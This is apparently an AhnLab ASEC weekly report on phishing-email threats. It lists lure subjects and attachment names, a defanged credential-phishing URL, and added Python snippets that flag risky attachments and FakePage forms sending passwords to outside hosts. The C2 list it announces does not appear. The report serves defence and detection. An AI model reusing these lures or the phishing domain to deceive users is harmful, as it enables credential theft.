AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post covers the phishing emails distributed during the week from March 26th, 2023 to April 1st, 2023 and provides statistical information on each type. Generally, phishing is described as an attack that leaks users’ login account credentials by disguising itself as, or impersonating, an institute, company, or individual through social engineering methods. In a broader sense, it is a technical subterfuge that enables the threat actor to carry out attacks such as information leaks, malware distribution, and fraud against a variety of targets. This post focuses on the fact that phishing attacks occur mainly through email and provides a detailed classification of the attack methods that are based on phishing emails. It also aims to minimize user damage by introducing newly observed attack types and emails that warrant users’ caution, along with their keywords. Only phishing emails with attachments are covered; emails that carry malicious links in the body without attachments are excluded.
Phishing Emails
During this week, the most prevalent threat type seen in phishing email attachments was FakePage, at 59%. FakePages are web pages in which the threat actor imitates the screen layout, logo, and font of real login or advertising pages to lead users to enter their account and password information. The entered information is sent to the threat actor’s C2 server or used to lure users onto other fake websites; see <FakePage C2 URL> below. The second most prevalent threat type was Downloader (22%), which includes loaders such as SmokeLoader and GuLoader. It was followed by Infostealers (7%) such as AgentTesla and FormBook, which leak user credentials saved in web browsers, email clients, and FTP clients. Aside from these, Backdoor (4%), which performs Infostealer activities and downloads additional malware, Worm (4%), and Trojan (3%) were detected. The threat types using phishing email attachments and their order of prevalence are similar to the order of malware distribution published weekly in the <ASEC Weekly Malware Statistics>.

File Extensions in Phishing Emails
We identified which file extensions the threats above used for their email attachments. FakePages were distributed as web page script documents (HTML, HTM, SHTML) that must be opened in a web browser. Other malware, including Infostealers and Downloaders, came attached with various file extensions, including compressed files (ZIP, 7Z, GZ, etc.), IMG disk image files, and DOCX document files.

Cases of Distribution
The following are distribution cases that occurred during the week from March 26th, 2023 to April 1st, 2023. The cases will be classified into FakePage and malware types, including Infostealer, Downloader, Exploit, and Backdoor. The numbers in email subjects and attachment filenames are unique IDs and may vary depending on the email recipient. Distribution cases with Korean subjects were also found. These are cases that specifically targeted Korean users instead of propagating themselves globally using the identical English subject and text.
Case: FakePage
| Email Subject | Attachment |
| --- | --- |
[DHL Express] Notice on Import Tax Payment Deadline – (INV and AWB) ✈ | ParcelDocumentDHL.htm |
Estimate (Order) | 24_153_IBXX 2307_54210_project order.htm |
[FedEx] Guide on Import License. | AWB#.SHTML |
FedEx Request for activating customer number | AWB#989345874598.html |
[** Industry] Request for estimate | ***** Industrial new order 2023-03-24.html |
DHL AWB shipping notice #0861542 | Original Shipping Doc#GM53726192.pdf.htm |
RE: Re: New order price (catalog edited) | 2023LEDprice.html |
Account Suspension (last warning) | Update Account.html |
All received emails have been deferred. | ********.com.html |
You have received an essential encrypted company email | message_790311_832743609.htm |
FedEx Shipment Arrival Notification | FedEx Shippingdocs.htm |
Inquiry | Inquiry.htm |
Attention: Service Suspension (Action Required for ******.co.kr) | Deposit_payment_confirmation.pdf |
Shipment Booking Confirmation – BL Draft is Ready for Review… | Doc_20230327-3938.pdf.html |
Your parcel has arrived urgent pick up needed today. | AWB #8347630147.html |
[SEC=OFFICIAL:Sensitive, ACCESS=Personal Data-Privacy] | Personal Data-Privacy-SecureMessageAtt.html |
There is an important encrypted corporate email you need to read | message_982155_128090224.htm |
Doc signed : Quote Agreement 16 Mar 2023 | Quotation-No#0381.shtml |
Re: Re: [subject line information removed] | W-9 Dt 03.22.2023.one |
New DHL Shipment Document Arrival Notice / Shipping Documents / Original BL, Invoice & Packing List | (DHL) Original BL, PL, CI Copies.htm |
Payment Copy | Payment Copy.gz |
FW:Re:Re: Payment Advice. | Proforma Invoice.html |
RE: Re: [subject line information removed] | form 03.22.2023 Gmail.one |
You have received an essential encrypted company email | message_033902_557044732.htm |
MAERSK LINE SHIPPING DOC SOUNDWORLD ENTERPRISE CO.,LTD | Shipping_Doc.html |
An important encrypted corporate email has been sent to you | SecureMessage.zip |
Pending invoice 10026870-1 | scan_10026870-1.htm |
Original invoice customs clearance notification. | Original-invoice & PList_admins.htm |
EFT Payment-Invoice 0000315: Completed_ Please Review and Sign | Settlement-Payment-On-Hold.pdf |
Your parcel has arrived urgent pick up needed today | Shipping_Doc.htm |
[DHL] Arrival Notice – Original Shipping Document – 2327821366 | scan_document.html |
FW: RE: WIRE INSTRUCTION | Scan_Wire Instruction.PDF.shtml |
Pickup Confirmation Wednesday, March 15, 2023 8:6 a.m.. | Swift_confirmation_copy.PDF.shtml |
RFQ- 1309445 | QUOTATION.pdf |
Attached is the remittance advice payment | 02112022093630.pdf.html |
new order(#0034) request | Invoice.html |
DHL Parcel Delivery Notification | Details.shtml |
Express Package Delivery Notification | AWB#details.html |
There is an important encrypted corporate email you need to read – | message_567890_498055656.htm |
Purchase Order PB2ED146HB2M-047 | Purchase Order PB2ED146HB2M-047.html |
op****@*********.co.kr Signed Document | e-Signed_Doc_____________op****@*********.co.kr.html |
An important encrypted corporate email has been sent to you | FAX_MAIL.zip |
EFT Payment sent On: Wednesday, March 22, 2023 2:53 a.m. | pjhh PaymentVocher.shtml |
Due_lnvoice__countec.comFriday, March 24, 2023 | Inv® #PT947234.htm |
SF Express | WaybillDoc_8945655902.html |
Greeting!!! | GAAS-RFQ#2022061602-KD-Ref.pdf |
maito_op****@*********.co.kr Signed Document | e-Signed_Doc_____________maito_op****@*********.co.kr.html |
Statement of Account | *****.com_SOA00424322332_xls.shtml |
Fw: Re: [subject line info removed] | Electronic form 03.22.2023.one |
An important encrypted corporate email has been sent to you – | message_381082_213244471.htm |
You have received an essential encrypted company email | message_924733_817031910.htm |
Re: FW: [spoofed sender name] | doc_0322.one |
Payment invoice Bank Transfer | Invoice#91273.pdf |
Re: (Urgent Order) – PO# M01552 | PO ella RFQ #M01552-PDF.shtml |
Re: Fw:Inquiry for 2023 New Products Prices | Old Prices.zip |
RE: PO.14036987,14038068 shipping documents and payment via DHL (083AB单) | payment_doc & shipment#7221HKT.htm |
Approved_New_PO0014232023 ******.co.kr | PO_00140323_Beals_Inc_******.co.kr.html |
< Re: New voice message from WIRELESS CALLER 15633963052 > | voicemail_03232023.htm. |
RE: New Invoice Order Payment | NewInvoiceOrderStatement.html |
FW: Payment | invoice sheet.html |
Purchase Order (Sales Invoice) | PurchaseOrderSheet.html |
RE: AMENDED INVOICES | Proforma Invoice.shtml |
Quote us your best offer on the attach order (treat urgently) | Purchase#order.html |
NEW ORDER- OC#8081013559 PO#3495-1022 | New order sign invoice for payment.htm |
Approved_New_PO0014232023 ********.com | PO_00140323_Beals_Inc_********.com.html |
Re: Proforma invoice | Swift Remittance.html |
Approved_New_PO0014232023 *********.com | PO_00140323_Beals_Inc_*********.com.html |
You have received an essential encrypted company email – Remote ID | Securedoc_06593415.html |
You have received an essential encrypted company email – Remote ID | Securedoc_39067527.html |
Approved_New_PO0014232023 ***********.co.kr | PO_00140323_Beals_Inc_**********.co.kr.html |
There is an important encrypted corporate email you need to read | Securedoc_93717448.html |
You have received an essential encrypted company email | Securedoc_23992084.html |
An important encrypted corporate email has been sent to you – | Securedoc_90978661.html |
There is an important encrypted corporate email you need to read – | Securedoc_67152574.html |
Case: Malware (Infostealer, Downloader, etc.)
| Email Subject | Attachment |
| --- | --- |
smart picture don’t show | myplp.exe |
sexy photos | sexpctrs.pif |
sexy pictures | superplp.gif.scr |
super nice images only for you | super_pctrs.scr |
super sexy photo only for you | sex_act.scr |
super sexy pics don’t show | super_img.pif |
super cool images imortant | the_imgs.scr |
super cool picture only for you | private__plp.jpg.exe |
very wonderful pictures | my_plp.gif.scr |
very cool pics | cool-action.gif.exe |
RE: RE: RE: RE: Захтев | 04352562561652.zip |
SOA FROM SHANGHAI LEAGUE/CITI LOGISTICS (USD 16) | SOA #00776122.docx |
Purchase order | 480038_944.r00 |
Credit note for the month of March 2023- 11005605 | SOA.MARCH.iso |
Borch request# RES_AGB_eroFame_DE_2023 Project | RES_AGB_eroFame_EN_2023.zip |
Bussiness Inquiry | Nutribrasalimentos.zip |
Aw: PAYMENTS | 30.03.2023_SWIFT MT 103_9078212345TRF.gz |
Give your best price on the demands | Products Needed__________________pif.arj |
DAMAGE GOODS/SETTLEMENT | Scan Pictures.img |
DHL Express SHIPPING NOTIFICATION | DHL Booking.zip |
FW: QUOTE REQUEST FOR SI-22311 II DOC- SI/MUM/2022-30/00307 II New PO# 10344 // CNEE | New PO# 10344_CNEE.docx |
Fw: Payment Advice – Advice Ref:[A1Xbj7fJ0V7W] /credits / Customer Ref:[BATCHFEB280301] / Second Party Ref:[TRN270323015] | Advice.jpg.7z |
Fw: RE: RFQ – Gauges and accessories | RFQ – Gauges and accessories.zip |
Fw: RE: URGENT****Our inquiry 23/SPEC02781 | SPEC02781.zip |
Employment Status And Salary Advance.. | Employment Status And Salary Advance…img |
LEGAL ACTION / LONG OVERDUE INVOICE | Details Aan Invoice 2.img |
NUEVA ORDEN DE COMPRA | PO-4101927653_APRIL 2023.gz |
New Scanned document from Kciltd Office Printer | Scan_Docs_004521.docx |
MV INLACO ACCORD / ETA: 25TH FEB ++ AGENT NOMINATION | DISCHG.IMG |
Successflly Transferred settlement for outsending SOA | swift.zip |
PO NO 0023 | PO NO 0023.zip |
Po 106069 | PO-1060688.z |
Payment Advice 564302 | Payment Advice 564302.docx |
Permintaan Informasi Harga | RFQ.LM-0107PDF.rar |
Price Inquiry – 28510837398013 | 20230331-28510837398013.rar |
Price Quotation for P/N: 61092-10 | SKM7109Y510S.IMG |
Price Quotation for P/N: ESP1092-10 | ESP15903YI0.IMG |
RE: A/R Down Payment Request 10285 | Bank Slip 30% Advance Payment to enable production of the goods.zip |
RE: FedEx Notification of Arrival – AWB# 102235516763 | FedEx Express AWB#102235516763.rar |
RE: PRO-FORMA INVOICE NO-1820Q/2023 | PI-1820Q.xls |
RE: Please Confirm Payment | Payment Copy USD14,000.zip |
RE: Request For Quote – Urgent ! | MRSK0052447.IMG |
RE: UPDATED SOA | 4970528.xls |
RE:FedEx Notification of Arrival – AWB# 102235516763 | FedEx Receipt_1022355161763.rar |
REVISED -Order 5879024-00/PO 4677/PO 4678 | PO feb.docx |
RFQ-WES/510/92/810 | WES51092Y810.IMG |
Re: Order-CHW/U2/SI/22-23/3534 | Order-CHWU2SI22-233534.xls |
Re: super smart pics | greatpctrs.exe |
Re:Request for Quotation | UPDATED_LIST.7z |
Retiro | retiro-pdf.gz |
Re[3]: wonderful images imortant | great-photos.gif.pif |
Re[3]: super nice images only for you | wild__action.jpg.scr |
Re[3]: very wonderful photos private | wild-plp.jpg.exe |
Re[2]: nice photos only for you | priv__scene.jpg.scr |
Re[2]: super smart pics just for you | fuck__images.gif.exe |
Re[2]: very nice picture | great__img.jpg.scr |
Re[2]: very nice picture imortant | bestimgs.scr |
Re[4]: very wonderful photos | prv_action.exe |
Re[5]: nice picture imortant | priv__act.exe |
Re[5]: super cool photo | priv__action.scr |
Re[5]: smart photo | fuckimages.pif |
Re[5]: very nice photos | fuck__pctrs.jpg.scr |
Rechnung, ausstehende Zahlung | RH-0987654345678.Z |
Reference Notice | Reference Notice_pdf.rar |
Request For Quotation | QUOTATION.zip |
Request For Quote #182044-13 | PO.xls |
Request for Quote | RFQ.exe |
World Surfaris Remittance | Balance$1,234,000,45-pdf.gz |
TOTSA – Request For Quotation | RFQ005412.IMG |
UPDATED SOA | Overdue soa.zip |
Urgent Order | Product Lists2.PDF.img |
cool pics | privateaction.pif |
beautiful photo | myscene.jpg.pif |
enquiry_2703_023 | enquiry_2703_023.rar |
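As an added illustration (not ASEC’s code or data), the following Python triage applies the attachment-extension and subject-keyword patterns visible in the two tables above to constructed rows. The extension sets, keyword list and risk levels are assumptions drawn from this week’s cases, not a published ruleset.

```python
import re
from dataclasses import dataclass, field

# Extension classes taken from the threat types and attachment extensions described above.
WEB_SCRIPT = {"htm", "html", "shtml"}                    # FakePage carriers, opened in a browser
EXECUTABLE = {"exe", "scr", "pif", "com", "bat", "cmd"}   # run directly on double-click
ARCHIVE = {"zip", "7z", "gz", "rar", "r00", "z", "arj", "iso", "img"}  # wrappers that dodge scans
DECOY = {"pdf", "docx", "xls", "doc", "jpg", "gif", "png"}  # harmless-looking inner extension
# Subject phrases recurring in the FakePage rows; 'PDF Online' is this week's keyword.
SUBJECT_KEYWORDS = ("pdf online", "encrypted company email", "encrypted corporate email",
                    "account suspension", "signed document", "pick up needed")

@dataclass
class Verdict:
    risk: str                               # "high", "medium" or "low"
    reasons: list = field(default_factory=list)

def extension_chain(filename: str) -> list:
    """'Original Shipping Doc#GM53726192.pdf.htm' -> ['pdf', 'htm'].
    Normalises the unicode ellipsis and trailing dots seen in real attachment names."""
    name = filename.strip().replace("\u2026", "...").rstrip(".").lower()
    return [p for p in name.split(".")[1:] if re.fullmatch(r"[a-z0-9]{1,5}", p)]

def triage(subject: str, filename: str) -> Verdict:
    """Score one subject/attachment pair with the heuristics the cases above suggest."""
    chain = extension_chain(filename)
    last = chain[-1] if chain else ""
    reasons = []
    if last in WEB_SCRIPT:
        reasons.append("web-script attachment (FakePage carrier)")
    if last in EXECUTABLE:
        reasons.append(f"executable extension .{last}")
    if len(chain) >= 2 and chain[-2] in DECOY and last not in DECOY:
        reasons.append(f"double extension .{chain[-2]}.{last}")
    direct = bool(reasons)                  # any of the three above executes on open
    if last in ARCHIVE:
        reasons.append(f"archive or disk image .{last} (inspect the inner file)")
    hits = [k for k in SUBJECT_KEYWORDS if k in subject.lower()]
    if hits:
        reasons.append("subject keyword: " + ", ".join(hits))
    return Verdict("high" if direct else "medium" if reasons else "low", reasons)

# Constructed sample rows modelled on the tables above (not ASEC's dataset).
SAMPLE = [
    ("DHL AWB shipping notice #0861542", "Original Shipping Doc#GM53726192.pdf.htm"),
    ("You have received an essential encrypted company email", "message_790311_832743609.htm"),
    ("sexy pictures", "superplp.gif.scr"),
    ("Payment Copy", "Payment Copy.gz"),
    ("Employment Status And Salary Advance..", "Employment Status And Salary Advance\u2026img"),
    ("Weekly meeting notes", "notes.txt"),
]

def triage_all(rows=SAMPLE):
    return [(subject, name, triage(subject, name)) for subject, name in rows]
```

A "medium" verdict on an archive only says the wrapper needs to be opened and its contents re-scored; it is not a clean result.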
The ASEC analysis team has selected keywords that users must look out for, based on the distribution cases above. If these keywords are included in the subject of the email, or if the same characteristics are found, users must exercise strict caution as they may be phishing emails from threat actors.
Keywords to Beware of: ‘PDF Online’
The keyword for this week is ‘PDF Online.’ A phishing website disguised as ‘PDF Online’ has been distributed recently. The fake webpage was mentioned in the ASEC Weekly Phishing Email Threat Trends published on March 17th. The phishing email impersonated a Korean company and was written in fluent Korean, so it was likely created from actual leaked content. These phishing emails carry HTML script file attachments. The attachment is a fake page bearing the text ‘PDF Online’ that prompts users to enter their IDs and passwords. When users input their account credentials, the information is leaked to the threat actor’s server; therefore, the information should not be entered.
- Phishing URL: https[:]//naturaverdebeauty[.]com/justld/next.php


FakePage C2 URL
When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server. The list below shows the threat actor’s C2 addresses of fake login pages distributed during the week.
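As an added example, not part of the original post, the following Python scanner inspects an HTML attachment for the FakePage exfiltration pattern just described: a password form, or an inline script, that sends input to a host outside the expected organisation. The FORM_RELAYS set, the same_org helper and the constructed ‘PDF Online’ sample with a placeholder form id are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosted form relays need no attacker-run server; formspree.io and submit-form.com
# both appear among this week's FakePage C2 addresses.
FORM_RELAYS = {"formspree.io", "submit-form.com"}

def same_org(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)

class FormScanner(HTMLParser):
    """Collects <form> targets, password inputs and URLs referenced from inline scripts."""
    def __init__(self):
        super().__init__()
        self.forms, self.script_urls, self._form, self._in_script = [], [], None, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form and a.get("type", "text").lower() == "password":
            self._form["password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # fetch()/XMLHttpRequest targets hard-coded in the page
            self.script_urls += re.findall(r"https?://[^\s'\"<>]+", data)

def assess(html: str, expected_domain: str) -> dict:
    """Flag an HTML attachment whose password form or script sends data outside expected_domain."""
    p = FormScanner()
    p.feed(html)
    findings, harvests = [], any(f["password"] for f in p.forms)
    for f in p.forms:
        host = (urlparse(f["action"]).hostname or "").lower()
        if f["password"] and host and not same_org(host, expected_domain):
            kind = "form relay" if any(same_org(host, r) for r in FORM_RELAYS) else "external host"
            findings.append(f"password form posts to {kind} {host}")
    for u in p.script_urls if harvests else []:
        host = (urlparse(u).hostname or "").lower()
        if host and not same_org(host, expected_domain):
            findings.append(f"credential page script references {host}")
    return {"fakepage": bool(findings), "findings": findings}

# Constructed sample modelled on the 'PDF Online' FakePage described above (placeholder form id).
SAMPLE_HTML = """<h2>PDF Online</h2><form method="post" action="https://formspree.io/f/EXAMPLEID">
<input type="email" name="email"><input type="password" name="password">
<button type="submit">View PDF</button></form>"""
```

A form with an empty action and no hard-coded URL is not flagged; such pages build the target at runtime and need dynamic analysis rather than this static pass.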
Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce them to access fake login pages or execute malware. Fake login pages are constantly evolving to resemble the original pages more closely. Attackers pack malware in compressed file formats to evade the attachment scans of users’ security products. Users must exercise strict caution and refer to recent distribution cases to avoid infection by malicious phishing emails. The ASEC analysis team recommends that users follow the email security guidelines below.
- Do not execute links and attachments in emails from unverified senders until they are proven to be credible.
- Do not enter sensitive information such as login account credentials until the site is found to be reliable.
- Do not execute attachments with unfamiliar file extensions until they are found to be reliable.
- Use security products such as antimalware software.
According to the MITRE ATT&CK framework, phishing email attacks correspond to the following techniques.
- Phishing for Information (Reconnaissance, ID: T1598[1])
- Phishing (Initial Access, ID: T1566[2])
- Internal Spearphishing (Lateral Movement, ID: T1534[3])
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.